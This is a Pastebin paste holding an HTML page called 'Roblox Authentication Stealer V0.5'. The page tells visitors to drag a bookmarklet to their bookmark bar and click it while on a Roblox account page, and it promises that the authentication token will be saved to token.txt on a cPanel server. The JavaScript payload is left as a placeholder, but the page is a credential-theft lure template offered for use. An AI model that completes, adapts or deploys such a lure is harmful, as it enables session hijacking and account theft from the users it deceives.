Code_Duckie

BOOKMARK SCRIPT

Mar 30th, 2021 (edited)
156
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.13 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <style>
  5. a:link, a:visited {
  6. background-color: #f44336;
  7. color: white;
  8. padding: 15px 25px;
  9. text-align: center;
  10. text-decoration: none;
  11. display: inline-block;
  12. }
  13.  
  14. a:hover, a:active {
  15. background-color: red;
  16. }
  17. </style>
  18. </head>
  19. <body>
  20. <h2>Roblox Authentication Stealer V0.5</h2>
  21. <h3>Setup Instructions</h3>
  22. <p>This only works if you are on computer. If you arent on computer then this wont work.<br></p>
  23. <p>1. Get the bookmark <b>simply</b> by dragging the <b>'Authentication Stealer'</b> button to your bookmark bar.
  24. <br>
  25. <br>
  26. <a id="bookmark"
  27. href="YOUR JAVASCRIPT HERE" onclick="copyToClip()" class="btn btn-sm btn-secondary btn-icon rounded-pill">
  28. <span class="btn-inner--text">Authentication Stealer</span></a></p><br>
  29. <p>If you dont see the bookmark bar then press <b>'CTRL+SHIFT+B'</b> then drag the button in an empty space.<br></p>
  30. <p>2. Go to an <b>account</b> on <b>roblox.</b><br></p>
  31. <p>3. Press on the bookmark and paste in the UID of the Account in the popup.</p>
  32. <p>4. Authentication token will be added to "token.txt" in your cPanel or File Manager.</p>
  33. </body>
  34. </html>
Add Comment
Please, Sign In to add comment